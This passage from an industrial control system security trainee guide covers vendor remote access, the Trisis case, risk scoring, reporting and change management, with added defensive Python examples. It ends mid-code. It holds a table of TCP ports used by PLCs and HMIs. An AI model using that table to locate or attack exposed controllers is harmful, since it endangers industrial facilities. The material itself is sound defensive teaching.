Some supply chain threats from this article:
• Counterfeit devices in industry
• Not knowing what your supply chain includes
• Not having a program that looks at the supply chain
• Lacking a procedure for when this happens
Exercise Notes:
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________

Return to the learning portal and continue with the next video.

Third-party access
Third-party access is an important aspect of ICS or OT systems. Third-party access is defined as a vendor or contractor needing access to an ICS system at a local or remote site. This access may be for maintenance, upgrades, administration, etc.
First, we need to look at the considerations for access – that is, why does the contractor or vendor need access to the ICS network? Most of this revolves around who maintains the systems for your organization.
• So, we need to ask:
• ________________________________?
  o First, verify the purpose of the third-party access.
  o Is it the vendor or a contractor working on the equipment?
  o It is important that third parties are safe when they come onsite, and some sites require that they have a good safety record. Make sure you know what is required before contractors/vendors are scheduled for access.
Training. Training when coming onsite is also important. What is needed for access? Contractors/vendors will need to understand your network layout and what they will have access to. Make sure the Management of Change (MOC) process is understood.
What in your site network segmentation is important for these third parties to understand? How do you protect other systems, both logically and physically?
How will third parties be monitored? What do you have in place to keep an eye on their activities? Always insist on knowing precisely what they are working on and how the changes could affect other systems.
Onsite access
It is also important to inform third parties of the policies that govern access to the systems. Be very careful with any outside hardware that needs to be attached to your system. Properly vet outside hardware and ensure it is secure: up-to-date antivirus, no dual homing (only one active network interface, so the device cannot bridge your control network to another network), up-to-date patching, and a malware scan before it is attached to the network or device. Never connect an outside laptop to your network unless it has been secured this way.
Only allow what is really needed. Do not give full network or physical access to third parties if they do not need it. Provide only a limited user account for system access.
Third parties need to be overseen by ICS staff onsite. If they need to work off hours, allowances can be made and signed for by management. This should all be well documented, and no changes should be made without ICS management staff onsite. Third parties should be escorted onsite unless they are properly trained for a site emergency.

Remote access
Third-party remote access did not used to be a big issue. Now we need to plan for remote access to everything. Remote access is a risk that should not be taken lightly. For a contractor/vendor to have remote access to an ICS system, there needs to be significant security in place.
Best practice is to avoid remote access whenever possible. When considering third-party remote access, start by asking why the third party needs network access and whether there is a reasonable alternative. If remote access is required, always ensure there are strong security policies in place to protect your organization's interests, and that those policies are enforced.
Network access:
• What is needed to get the work done?
• How is the access granted?
• Who is in control of the access?
• Authentication – is multi-factor authentication required?
• Jump box in the DMZ (the vendor lands on the jump box and never connects directly to control-network devices)
• Hours during which access to the system is allowed
• How are you going to monitor the connection (logging, IDS)?
• VPN / connection policy
• Verification of the remote computer's security policy (posture) before it connects
• What does the connection have access to on the network (only what is necessary)?
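Both the onsite hardware rules above (up-to-date antivirus and patches, no dual homing, scanned before connection, a limited account) and the remote-access questions in this list can be written down as a policy that is checked the same way for every request. The following Python module is an added example, not part of the course material or any vendor product: it evaluates a third-party access request against an assumed vendor register (allowed targets, hours, maximum session length), the posture of the vendor's computer, and the jump-box, MFA and limited-account requirements, and returns every reason for denial rather than only the first so the vendor can fix them all at once. Vendor names, hosts, ports, dates and limits are constructed.

```python
"""Evaluate a third-party access request against the controls listed above.

Added example for the course text; not part of the original page. The vendor
register, time windows, posture limits and both sample requests are assumptions
an operator would replace with their own policy.
"""
from dataclasses import dataclass
from datetime import datetime, time, timedelta

# Vendor register: what each vendor may reach and when (assumed values).
VENDOR_REGISTER = {
    "Acme Loaders": {
        "targets": {("loader-plc-01", 502), ("loader-hmi-01", 3389)},
        "hours": (time(7, 0), time(17, 0)),   # window for unsupervised sessions
        "max_duration": timedelta(hours=4),
    },
}
MAX_AV_SIGNATURE_AGE = timedelta(days=3)    # assumed posture limits
MAX_PATCH_AGE = timedelta(days=30)


@dataclass
class Posture:
    """Result of the pre-connection check on the vendor's computer."""
    av_signature_date: datetime
    last_patch_date: datetime
    active_adapters: int      # more than one means the device is dual-homed
    scanned_clean: bool


@dataclass
class AccessRequest:
    vendor: str
    purpose: str
    targets: set              # (hostname, port) pairs the vendor wants to reach
    start: datetime
    end: datetime
    via_jump_host: bool       # session terminates on the DMZ jump box
    mfa: bool
    account_is_admin: bool
    posture: Posture
    management_signoff: bool = False


def evaluate(req, now):
    """Return ("allow", []) or ("deny", [reasons...]) for one request."""
    entry = VENDOR_REGISTER.get(req.vendor)
    if entry is None:
        return "deny", ["vendor is not in the approved-vendor register"]
    reasons = []
    unknown = req.targets - entry["targets"]
    if unknown:
        reasons.append(f"targets not approved for this vendor: {sorted(unknown)}")
    if not req.via_jump_host:
        reasons.append("session must terminate on the DMZ jump box, not on the control network")
    if not req.mfa:
        reasons.append("multi-factor authentication is required")
    if req.account_is_admin:
        reasons.append("use the limited vendor account, not an administrative one")
    if req.end - req.start > entry["max_duration"]:
        reasons.append("requested window exceeds the maximum session length")
    lo, hi = entry["hours"]
    off_hours = (req.start.date() != req.end.date()
                 or req.start.time() < lo or req.end.time() > hi)
    if off_hours and not req.management_signoff:
        reasons.append("off-hours access requires management sign-off")
    p = req.posture
    if now - p.av_signature_date > MAX_AV_SIGNATURE_AGE:
        reasons.append("antivirus signatures are out of date")
    if now - p.last_patch_date > MAX_PATCH_AGE:
        reasons.append("operating system patches are out of date")
    if p.active_adapters > 1:
        reasons.append("device is dual-homed; disable every adapter except the one used here")
    if not p.scanned_clean:
        reasons.append("device has not been scanned clean before connection")
    return ("allow" if not reasons else "deny"), reasons


# Constructed sample requests: one that meets the policy and one that does not.
NOW = datetime(2023, 3, 1, 8, 0)
GOOD_POSTURE = Posture(datetime(2023, 2, 28), datetime(2023, 2, 15), 1, True)
BAD_POSTURE = Posture(datetime(2023, 1, 10), datetime(2023, 2, 15), 2, True)
GOOD_REQUEST = AccessRequest(
    "Acme Loaders", "loader PLC firmware check", {("loader-plc-01", 502)},
    datetime(2023, 3, 1, 9, 0), datetime(2023, 3, 1, 12, 0),
    via_jump_host=True, mfa=True, account_is_admin=False, posture=GOOD_POSTURE)
BAD_REQUEST = AccessRequest(
    "Acme Loaders", "troubleshoot loader",
    {("loader-plc-01", 502), ("scada-server-01", 3389)},
    datetime(2023, 3, 1, 20, 0), datetime(2023, 3, 1, 23, 0),
    via_jump_host=False, mfa=False, account_is_admin=True, posture=BAD_POSTURE)

if __name__ == "__main__":
    for req in (GOOD_REQUEST, BAD_REQUEST):
        decision, reasons = evaluate(req, NOW)
        print(f"{req.vendor}: {req.purpose} -> {decision}")
        for r in reasons:
            print("   -", r)
```

The second request fails on seven counts at once: a target the vendor has no business reaching (direct RDP to a SCADA server), a direct connection instead of the jump box, no MFA, an administrative account, an evening window with no management sign-off, stale antivirus signatures and a dual-homed laptop. Keeping the register in a file that is reviewed with the vendor contract, rather than in someone's head, is what turns this from a script into a control.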
Third-party access use case – Trisis
What: An oil and gas plant in Saudi Arabia
Event: In late August 2017, Trisis (also known as Triton) malware infected ICS computers
Impact: Complete shutdown of the entire facility
Specifics: The trilog.exe program, along with Library.zip, was downloaded to the affected engineering workstation. The malware targets the plant's safety instrumented system (SIS) controllers. It could have been introduced by USB or email.
Lessons learned:
• SIS networks need to be isolated from the rest of the plant
• This could have been much worse, but the actor made a mistake in the code, which tripped the safety system and caused the shutdown
• The malware could easily have been installed at the vendor level before installation at the site
• Scan all computers

Third-party exercise questions
Look at the situation below and answer the questions.
The Acme Company has an oil refinery in the U.S. A vendor has installed some new equipment to load material from one refinery unit to another. They would like to set up remote support for this equipment to maintain it and check problems while the equipment is in operation.

1. Who is responsible for handling this request?

2. What questions would you ask of the vendor before considering this request?

3. What mitigation would you put in place if remote access is required to have support from this
vendor?

Potential exercise answers:
1. Probably the unit planners and process control staff
2. What is your remote connection support policy? Do you scan your computers for malware and keep them up to date? Did you sign the SLA?
3. Compliance (posture) checks on the VPN client. Two-factor authentication. A developed policy for remote access. A DMZ to connect through.

Return to the learning portal and continue with the next video.

Supply chain recap
Evaluation questions
• Does the organization verify purchases from well-known vendors? Is documentation in place showing how each purchase was verified?
• Is there a process for vetting vendors? How do you ensure they are cyber-aware and safe?
• Does the organization know which vendors are currently in use and whether each is allowed access?

Cybersecurity plan mapping

Common issues/findings
• The system has multiple remote access options
• No process governing the implementation of remote access
• No network access control (NAC/NAP) for devices that connect
• Direct VPN access to SCADA

Step 6 – Determine Critical Risk

Outcomes
In this section we will discuss how to determine which of the issues collected throughout the evaluation present critical risk to your business.
Learning Objective 10
Evaluate risk management and mitigation approaches
Our purpose here is to crystallize recommendations from the issues collected throughout the evaluation process. It is very important to understand that as evaluators we are not doing the remediation work but recommending solutions that can/should be deployed.
The image that accompanies this section shows the four main portions of how to identify, prioritize, manage, and report risk. This section will show how to fill in the Findings Report so there is a paper trail to document and show follow-through on all actions. The steps in the image are:
• Define and frame business risk
• Bound risk based on documented issues
• Determine individual issue risk
• Prioritize overall risk based on critical issues (findings)
• Recommend a risk management approach for each finding
• Create the evaluation report

Business risk
Risk Management:
• Risk: ____________________________________________________________________.
• Risk assessment: ____________________________________________________________________.
• Risk management: ______________________________________________________________________________________________________.
NOTE: Risk assessment and risk management are continuous processes.

Frame Business Risk:
• How does an organization view risk in a business context?
• What is the environment in which risk decisions are made?
• What is the organization's overall risk-management strategy?
• How does the organization assess, respond to, and monitor risk?

Framing organizational risk in the context of an ICS cybersecurity evaluation:

Recommend resources for each finding:
• Define and recommend roles/responsibilities for risk management
• Identify primary and secondary points of contact (POC) for mitigation of each finding
The next step is to identify potential resources in order to assign resolution of the issue. You should be very aware of the potential players needed to resolve these issues. This becomes even more important considering that the final resolution for risk management will need to involve collaboration with these individuals. Further, these individuals will likely be the ones responsible for issue/finding resolution, as the evaluator's job likely ends after the recommendation.

Determining ICS cybersecurity risk
It is important to note that each of these are scoring methods based on available evidence, experience,
and/or expert judgment.
It is also very important that evaluators understand this is not an exact science, and sometimes risk is a
squishy assumption. This is the other reason why it is important to provide outside evidence to
management on conclusions that recommendations are reliable, valid, and practical.
In addition, as your recommendations for risk management become more predictable and based on
standardization evaluators, those recommendations are more likely to accomplish cybersecurity goals.

The Cyber Security Evaluation Tool (CSET®) provides a systematic, disciplined, and repeatable
approach for evaluating an organization’s security posture. CSET® is a desktop software tool that
guides asset owners and operators through a step-by-step process to evaluate industrial control system
(ICS) and information technology (IT) network security practices. Users can evaluate their own
cybersecurity stance using many recognized government and industry standards and
recommendations.
The CSET® download has moved to GitHub: https://github.com/cisagov/cset/releases
Older legacy versions of the software are also available on GitHub.

179 | Page
Consequence-driven Cyber-informed Engineering (CCE) is a guided methodology for operators to identify
key points vulnerable to a cyberattack. CCE provides a method to discover information needed to
calculate operational cyber risk. It is focused on engineered solutions designed to disrupt a physical
cyberattack.
The phases of CCE are:
1. Consequence prioritization
2. System-of-systems breakdown
3. Consequence-based targeting
4. Mitigations and protections

Basic risk method
 Determine likelihood and impact
 Determine individual risk for each issue; reveal critical risk
 Provide recommended actions (mitigations) for findings (critical-risk issues)
When dealing with an ICS cybersecurity evaluation, or any other topic that could be considered outside
the business realm, it is important to help evaluators speak to the business issue. Specifically, here, it is
important that an evaluator be able to provide leadership (business decision-makers) with quantifiable,
or as close to quantifiable as possible, metrics from which business decisions can be made. The best
practice in industry for risk management is to determine likelihood (probability of occurrence of the
issue) and then to determine impact (severity of loss to the business if the event occurs).
 Likelihood (probability of occurrence)
o Represented in a non-statistical sense (i.e., is not an exact number)
o Probability a threat exploits a vulnerability, exposing risk
o Defined as qualitative, based on evidence, experience, and expert judgment
 Impact (severity of loss to business based on criticality)
o Amount of loss resulting from a threat exploiting a vulnerability
o Based on available evidence, experience, and expert judgment

180 | Page
o Identifies the severity of a loss based on internal and external variables
o Risk prioritized by impact to business-critical functions
 Qualitative vs. quantitative
Example of issue listed in an issues and findings report
 Likelihood (probability of occurrence)
o Moderate (low to medium) risk that a remote exploit occurs
o Based on medium risk, the likelihood score for this issue is a 5
Control: AC-17(3)
NIST 800-53 Control Family: Network - Remote Access
Issue: System has multiple remote access options
Discovery: Remote access can grant malicious individuals persistence and ease of access to company resources.
Risk: Remote access can grant malicious individuals persistence and ease of access to company resources.

 Impact (severity of loss to business/mission)
o High – if someone were to access the ICS remotely, severe problems could occur
o Based on a high risk, the impact score for this issue is a 9
o Verify impact is conditioned, ranked, and assigned based on impact to business-critical function.

181 | Page
Issue graphing

This is a heat map showing each issue found in the evaluation process mapped on a graph. The graph
takes the overall likelihood and overall impact for each issue and plots them. It is called a heat map
because the colors of the graph illustrate that the more critical the likelihood and impact are to the
system, the more destructive or “hot” the issue is considered.
As is shown on the slide, it is important to show, in context, the ranges of likelihood and impact. Most
importantly, we probably don’t want to spend a lot of time producing risk management approaches for
issues that may never happen, or that, if they did happen, would not result in loss.
The evaluation process should focus on those issues that matter most to the organization/mission
criticality.

182 | Page

183 | Page
Narrowing focus – Once critical risk is discovered, the focus of evaluation will be to provide
recommended mitigations for findings (yellow). Issues outside the critical risk quadrant of the graph
may also need focus.
Table columns: Control, NIST 800-53 Control Family, Issue, Discovery, Risk, Recommendation, Resource.
The issues found and the resource recommended for each:
 No Central Account Management System – ISSO
 No secure remote access architecture – CISO
 System has multiple remote access options – Information Security Architect
 Logs are not retained in a centralized location and analyzed – IT Administrator
 No Authoritative Time Source within system – OT operator
 Logs are not kept long enough or data within them is overwritten too fast to be of value – Quality Control
 No Change management / configuration control process – Systems Engineering
 Changes to the system are not tested before being put in production – Quality Control
 Poor / Non-existent boundary controls – Networking Team
 Routable IP Addresses used in Private Network – Networking Team
 No process governing the implementation of remote access – CIO
 No mobile device policy – CIO
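As an added example (not from the guide), the basic risk method, the heat map and the narrowing of focus to the critical quadrant can be carried out over a small issues register such as the one above. The 1-10 scales, the likelihood-times-impact scoring rule, the cutoff of 5 for the critical quadrant, the scores themselves, and every control id other than AC-17(3) are assumptions made for this example.

```python
from dataclasses import dataclass

SCALE_MAX = 10       # assumed 1-10 scale; the guide's worked issue scores likelihood 5 and impact 9
CRITICAL_CUTOFF = 5  # assumed cutoff: both scores at or above it place an issue in the critical quadrant
BINS = 5             # heat map resolution: 5 x 5 cells, each spanning 2 score points


@dataclass(frozen=True)
class Issue:
    control: str      # NIST SP 800-53 control; only AC-17(3) is from the guide, the others are assumed
    issue: str
    likelihood: int   # qualitative judgment expressed as a score, not a statistical probability
    impact: int       # severity of loss to business-critical functions
    resource: str     # recommended point of contact for mitigation

    def risk(self) -> int:
        """Individual risk as likelihood times impact (assumed scoring rule)."""
        return self.likelihood * self.impact

    def is_critical(self) -> bool:
        return self.likelihood >= CRITICAL_CUTOFF and self.impact >= CRITICAL_CUTOFF


def validate(issue: Issue) -> None:
    """Reject scores outside the agreed scale so registers stay comparable across evaluations."""
    for name, value in (("likelihood", issue.likelihood), ("impact", issue.impact)):
        if not 1 <= value <= SCALE_MAX:
            raise ValueError(f"{issue.control}: {name} score {value} is outside 1..{SCALE_MAX}")


def prioritize(issues: list[Issue]) -> list[Issue]:
    """Critical-quadrant issues first, then descending risk, so effort goes where it matters."""
    for issue in issues:
        validate(issue)
    return sorted(issues, key=lambda i: (not i.is_critical(), -i.risk()))


def findings(issues: list[Issue]) -> list[tuple[str, str]]:
    """The (issue, resource) pairs that move forward into the Recommend Actions step."""
    return [(i.issue, i.resource) for i in prioritize(issues) if i.is_critical()]


def heat_map(issues: list[Issue]) -> list[list[int]]:
    """Issue count per cell; row index grows with impact, column index with likelihood."""
    cell = SCALE_MAX // BINS
    grid = [[0] * BINS for _ in range(BINS)]
    for i in issues:
        grid[(i.impact - 1) // cell][(i.likelihood - 1) // cell] += 1
    return grid


def render_heat_map(issues: list[Issue]) -> str:
    """Text rendering with high impact at the top, the orientation used on the slide."""
    cell = SCALE_MAX // BINS
    grid = heat_map(issues)
    lines = []
    for r in range(BINS - 1, -1, -1):
        cells = " ".join(f"{n:2d}" for n in grid[r])
        lines.append(f"impact {r * cell + 1:2d}-{(r + 1) * cell:2d} | {cells}")
    lines.append(f"{'likelihood':<12} | " + " ".join(f"{c * cell + 1:2d}" for c in range(BINS)))
    return "\n".join(lines)


# Constructed register: issue texts and resources are taken from the guide's findings table;
# the scores, and every control id except AC-17(3), are assumptions made for this example.
REGISTER = [
    Issue("AC-17(3)", "System has multiple remote access options", 5, 9, "Information Security Architect"),
    Issue("AC-2", "No Central Account Management System", 6, 7, "ISSO"),
    Issue("AU-11", "Logs are not kept long enough or are overwritten too fast", 7, 4, "Quality Control"),
    Issue("AU-8", "No Authoritative Time Source within system", 3, 3, "OT operator"),
    Issue("SC-7", "Poor / Non-existent boundary controls", 8, 8, "Networking Team"),
    Issue("CM-3", "No Change management / configuration control process", 4, 6, "Systems Engineering"),
]

if __name__ == "__main__":
    for i in prioritize(REGISTER):
        flag = "CRITICAL" if i.is_critical() else "        "
        print(f"{flag} risk={i.risk():2d} {i.control:9s} {i.issue} -> {i.resource}")
    print(render_heat_map(REGISTER))
```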

Sources:
• NIST SP 800-30 Guide for Conducting Risk Assessments, 2012
• Handbook for Self-Assessing Security Vulnerabilities & Risks of Industrial Control Systems on
DOD Installations, 2012
• NIST SP 800-39; Managing Information Security Risk (Organization, Mission, and Information
System View), 2011

184 | Page
Step 7 – Recommend Actions
Identify countermeasures, document recommendations, update artifacts, final report

TRAINEE GUIDE

Outcomes
In this section we will discuss how to identify countermeasures, document recommendations,
update artifacts, and complete your final report.

185 | Page
Step 7 – Recommend actions
From here we move to Step 7, Recommend Actions.
NOTE: In the last step (6) we took the text straight from the NIST document and did not tailor it to our
specific findings. As such, it is important to ensure an evaluator takes the opportunity to verify that
recommendations match the actual finding risk and risk mitigation. It is also very important to
collaborate with, meet with, and discuss with onsite individuals (and/or those most closely associated
with the finding) to validate the recommendation before going into the evaluation report phase.

Recommend mitigation
Gap current and secure
 Tailor mitigation to meet business need
 Document gap between issue and recommended best practice/regulatory guideline
o Allows for early validation of recommendation
 Validate recommendation
o Practical per-organization criteria
o Feasible (affordable and doable)
o Noting the final evaluation report on the horizon, seek to eliminate surprises
 Establish/append supporting ICS cybersecurity documents
o Review cybersecurity documents: ICS Cybersecurity Plan, previous evaluation reports
o Choose an applicable document to establish mitigation

186 | Page
Mitigation complete
Now that recommendations include a risk management approach to help resolve the finding, we will
add the final piece of the recommendation for each finding. This piece requires the evaluator to
understand an organization’s policies, procedures, and processes. Specifically, it is important to note
that cybersecurity or security changes are often made as one-offs in the solution. We therefore need to
verify that our approach to evaluating and resolving critical risk is repeatable (reliable), has
standardized methods and approaches for resolution (standardization), has proven effective once the
finding is resolved (validity), and that each recommendation is practical in approach (both in monetary
cost and business opportunity cost). The documents listed here are primarily from the INL N&HS ICS
Cybersecurity Maturity and Competency model, but others are added from additional best practices.
Complete evaluation recommendations by creating/completing the findings and issues report. An
example issues/findings report is available for download in this session.
Table columns: Discovery, Risk, Recommendation, Resource.
1. Text that accomplishes risk mitigation
Discovery: Remote access can grant malicious individuals persistence and ease of access to company resources.
Risk: Remote access can grant malicious individuals persistence and ease of access to company resources.
Recommendation: Limit remote access to the control system networks through one highly controlled and
monitored network path, such as VPN connection to a corporate jump server and remote desktop
sessions to a control system jump server. Do not allow direct communication between the control
system network and any external source, especially the Internet. Follow the recommended architecture
referenced in the NCCIC/ICS-CERT defense-in-depth document.
Resource: Information Security Architect
2. Modification or establishing applicable security policies and procedures
Recommendation: Remote Access Policy; ICS Cybersecurity Plan

Evaluation report
This reporting section was added because it is critical to be able to provide a final standardized output
for an evaluation report. These items are all from NIST SP 800-53r4 and are strictly for example
purposes. For purposes of the course evaluation (exercise) phases, the expectation is not that you will
need to complete a final report. This information is added and will be covered briefly so trainees
understand that the final report is the crown jewel of the evaluation. It serves as the baseline for future
evaluation efforts in cybersecurity evolution.
Executive summary:
 Date, purpose, scope
 Initial or follow-up
187 | Page
 Bound evaluation (company-wide, business/mission specific, system specific)
 List critical findings and recommendations
 Describe risk
Body of the report:
 Describe, in full, the purpose of the evaluation (what answers are being sought)
 Identify assumptions and constraints
 Provide a rationale for any risk-related decisions during the evaluation (risk recommendation)
process
 Describe uncertainties with evaluation process
 Describe specific mission/business, organization(s), systems evaluated
 Summarize evaluation results
 Identify time frame of evaluation
 List critical issues that present risk based on adversarial threat
Appendices:
 References
 Team or individuals conducting the evaluation
 Evaluation details to include issues and findings report, other supporting evidence
Sources:
• NIST SP 800-53r4; Security and Privacy Controls for Federal Information Systems and
Organizations (April 2013)
• NIST SP 800-30 Guide for Conducting Risk Assessments, 2012

188 | Page
Step 8 – Monitor and Reassess
Continuous monitoring

TRAINEE GUIDE

Outcomes
In this section we will discuss the steps for continuous monitoring.

189 | Page
Step 8 – Monitor and reassess
Finally, we move into Step 8, Monitor and Reassess.

Steps for monitoring and reassessing


 Defined system by understanding: (Complete)
o Assets and Business impacts
o Security/Threat/Vulnerability and Risk
 Established metrics/evaluation frequency (Done)
o Process for Evaluation
o Evaluation architecture
 Implement and Analyze - Report (Accomplished)
o Collected data with initial analysis
o Provided report outlining Critical Risk and Mitigations
 Respond (to findings)
o Handle Critical Risk
 Accept Risk
 Avoid Risk
 Share Risk
 Transfer Risk
 Mitigate Risk
 Review/Update
o Review evaluation processes
o Establish change/configuration management process
190 | Page
RESPOND
 Responding to ‘Critical Risk’
o Accept – within risk tolerance, so the course of action (COA) is to ‘accept’ the risk completely
without action
o Avoid – exceeds risk tolerance; the COA is to ‘avoid’ the risk completely by taking specific actions
o Share – shifts a portion of risk responsibility (liability) to other organizations
o Transfer – shifts the entire risk to another entity, generally an insurance company
o Mitigate – ‘risk reduction’; used when a ‘portion’ of the risk cannot be accepted, avoided, shared, or
transferred. For example, deploying a common security control for ‘complex’ passwords mitigates risk
against potential identity theft.
Review/update
 Establish a Change Management Process
o Assign a Change Management Supervisory Role
o Convene a Change Management Board with all appropriate stakeholders
o Identify, Implement, and Monitor Changes

Change/configuration management process


 Identify / Document:
o Current system/component baseline(s)
o Record requested changes – approved or disapproved
o Build a change management approval process and/or ticketing system
 System and configuration changes implemented:
o Upon majority CM Board Approval with established, regular CM review meetings
o With CM stakeholder assignments to CM review meetings
o Via prepared agendas and minutes
 Stakeholders for change are invited
 Records are kept for disposition on all changes
 Change management requests submitted for:
o Planned adaptations to current system or configuration baselines
o Hot wash (disposition) on unplanned events causing baseline adaptation(s)

191 | Page

192 | Page

193 | Page
Appendix B: Deer Island Treatment Plant Wastewater Collection and Treatment

WHERE DOES ALL THE SEWAGE COME FROM?


From people using water in kitchens and bathrooms in their homes and from commercial and industrial
use. Nearly half the state's population, over 2 million people in 43 communities, send sewage to
MWRA's treatment plants on the shores of Boston Harbor. Over 5,500 businesses and industries
contribute wastewater as well. In addition, nearly half of the total flow in MWRA sewers is from rainy-
weather street runoff and from below-ground cracks and faulty connections that allow groundwater into
the system.

194 | Page

HOW DOES SEWAGE GET TO THE TREATMENT PLANTS?


Sewage travels through three different sets of pipes. Water that is used in a home or industry is flushed
through a building's pipes until it reaches local sewers, which are owned and operated by city and town
sewer departments. These 5,100 miles of local sewers transport the wastewater into 227 miles of
MWRA interceptor sewers. The interceptor sewers, ranging from 8 inches to 11 feet in diameter, carry
the region's wastewater to two MWRA treatment plants. Though most of the wastewater flows by
gravity, some low-lying areas require pumping.
HOW DOES SEWAGE TREATMENT WORK?
MWRA provides preliminary, primary, and secondary treatment to its wastewater flows at the Deer Island
Treatment Plant. The first phase of secondary treatment began operating in July 1997. The treatment
process is as follows:
 Collection and Pumping
Sewage is piped from communities to several headworks where bricks, logs and other large
objects are screened out. Pumps draw the sewage through deep-rock tunnels under the harbor
to Deer Island.
 Preliminary Treatment
Mud and sand settle in a tank called a grit chamber. Later, this material, known as grit and
screenings, is taken to a landfill for environmentally safe disposal.
 Primary Treatment
The sewage then flows to primary settling tanks where up to 60% of the solids in the waste
stream settle out as a mixture of sludge and water. This primary treatment removes very few
toxic chemicals.
 Secondary Treatment
In the secondary treatment plant oxygen is added to the wastewater to speed up the growth of
micro-organisms. These microbes then consume the wastes and settle to the bottom of the
secondary settling tanks. After secondary treatment, 80-90% of human waste and other solids
have been removed. A significant proportion of toxic chemicals are also removed by this
process.
WHERE DOES ALL THE TREATED WASTEWATER AND SLUDGE GO?
The remaining wastewater is disinfected before it is discharged to the receiving waters (Massachusetts
Bay). This stream of treated wastewater, known as effluent, travels through a 9.5-mile Outfall
Tunnel bored through solid rock more than 250 feet below the ocean floor. The tunnel's final 1.25 miles
include 55 separate release points known as "diffusers." By extending to an area with water depths up
to 120 feet, this outfall provides a much higher rate of mixing and/or dilution than is possible with
present discharges into the shallow waters of Boston Harbor.
Sludge from primary and secondary treatment is processed further in sludge digesters, where it is
mixed and heated to reduce its volume and kill disease-causing bacteria. It is then transported through
the Inter-Island Tunnel to the pelletizing plant in Quincy, where it is dewatered, heat-dried and
converted to a pellet fertilizer for use in agriculture, forestry, and land reclamation.

195 | Page
Appendix C: TCP Ports used by PLC’s (Programmable Logic Controllers) and HMI/OIT’s
Source: PLC Remote Access FAQs, plcremote.net/143-2/, October 6, 2015 (accessed 8/24/2019)

List of TCP port numbers used by commercial equipment controllers:

 Allen Bradley – All newer Rockwell PLC’s: 44818


 Allen Bradley – Older Rockwell AB PLC5E and SLC5/05 use TCP 2222
 BECKHOFF Embedded PC: 48898
 Danfoss ECL Apex: 5050
 FATEK FB Series: 500
 GE Fanuc Series 90-30: 18245
 GE SRTP uses TCP ports 18245 and 18246
 GE QuickPanels use TCP port: 57176
 HITACHI EHV Series: 3004
 KEYENCE KV-5000: 8501
 Korenix 6550: 502
 Koyo Ethernet: 28784
 LS GLOFA FEnet: 2004
 LS XGB FEnet: 2004
 LS XGK FEnet: 2004
 Memobus (Yaskawa MP Series Controllers): 502
 Mitsubishi FX: 1025
 MITSUBISHI FX3u (Ethernet): 5001
 MITSUBISHI MELSEC-Q (Ethernet): 4999
 MITSUBISHI MR-MQ100 (Ethernet): 4999
 MITSUBISHI QJ71E71 (Ethernet): 5002
 MODBUS TCP/IP (Ethernet): 502
 MODBUS Server (Modbus RTU Slave): 502
 Omron PLC: 9600
 Panasonic FP (Ethernet): 9094
 Panasonic FP2 (Ethernet): 8500
 Parker Drives using MODBUS TCP/IP (Ethernet): 502
 Red Lion HMI’s: 789
 SAIA S-BUS (Ethernet): 5050
 Schleicher XCX 300: 20547
 Siemens S7 protocol uses TCP Port: 102
 Toshiba Series PLC’s uses Modbus Port: 502
 Trio (MODBUS RTU, TCP/IP): 502
 Unitronics Socket1 – TCP slave: 20256
 Unitronics Socket2 – TCP slave: 502
 Unitronics Socket3 – TCP slave: 20257
 Wago CODESYS – TCP: 2455
 YAMAHA NETWORK BOARD Ethernet RCX series uses Telnet Port: 23

196 | Page
 YASKAWA MP Series Ethernet: 10000
 YASKAWA MP2300Siec: 44818
 YASKAWA SMC 3010 (Ethernet): 23
 Yokogawa FA-M3 (Ethernet): 12289

Newer Rockwell Allen Bradley Detailed Equipment List for TCP Port 44818
 1756-ENET
 1756-ENBT
 1756-EWEB
 1794-AENT
 1734-AENT
 1769-L35E, 1769-L32E
 1788-ENBT
 1761-NET-ENI
 1785-LXXE
 1785-ENET
 1747-L55x
 1763-L16x
 1766-L32x
 PowerMonitor 1000
 PowerMonitor 3000
 PowerMonitor 5000
 PanelView
 RSLinx Classic
 RSLinx Enterprise
 INTERCHANGE (rsicd)

Older Rockwell Allen Bradley Equipment List TCP Port 2222


 1785-Lxxe
 1785-ENET
 1771-DMC(x)
 1747-L55x
 5820-EI
 PowerMonitor II
 INTERCHANGE
 PowerMonitor 1000
 PowerMonitor 3000
 PowerMonitor 5000
 RSLinx Classic
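As an added example (not from the guide or from the source site), the port table in this appendix can drive a boundary check over flow records, applying the Step 7 remote access recommendation that the control system network is reached only through one controlled and monitored path: any TCP flow to one of these ports that comes neither from inside the control network nor from the sanctioned jump server is recorded as a finding. The port subset, the subnets, the jump server address, the record format and the flow records are all constructed for the example.

```python
import ipaddress
from collections import Counter

# Subset of the appendix's TCP port table: destination port -> equipment/protocol as listed there.
ICS_PORTS = {
    102: "Siemens S7",
    502: "Modbus TCP/IP",
    2222: "Allen Bradley, older Rockwell PLC5E and SLC5/05",
    9600: "Omron PLC",
    18245: "GE SRTP",
    44818: "Allen Bradley, newer Rockwell PLCs",
}

# Assumed network layout for the example: the control system network and the single
# jump server that the recommended architecture allows to reach into it.
CONTROL_NET = ipaddress.ip_network("10.10.0.0/16")
JUMP_SERVERS = {ipaddress.ip_address("10.20.0.5")}


def parse_flow(line: str):
    """Parse one constructed flow record of the form 'src_ip src_port dst_ip dst_port proto'."""
    src, sport, dst, dport, proto = line.split()
    return ipaddress.ip_address(src), int(sport), ipaddress.ip_address(dst), int(dport), proto.upper()


def classify(src, dst, dport: int, proto: str):
    """Return None for flows outside scope, else 'internal', 'sanctioned' or 'finding'."""
    if proto != "TCP" or dport not in ICS_PORTS or dst not in CONTROL_NET:
        return None            # the appendix lists TCP ports only, so UDP and other ports are out of scope
    if src in CONTROL_NET:
        return "internal"      # controller-to-controller or HMI traffic inside the control network
    if src in JUMP_SERVERS:
        return "sanctioned"    # the one highly controlled and monitored path
    return "finding"           # direct reach into the control network from anywhere else


def review(lines):
    """Tally verdicts and collect the flows an evaluator would record as a finding."""
    counts: Counter = Counter()
    found = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        src, _sport, dst, dport, proto = parse_flow(line)
        verdict = classify(src, dst, dport, proto)
        if verdict is None:
            continue
        counts[verdict] += 1
        if verdict == "finding":
            found.append(f"{src} -> {dst}:{dport} ({ICS_PORTS[dport]})")
    return counts, found


# Constructed sample records, not captured from any real network.
SAMPLE_FLOWS = """\
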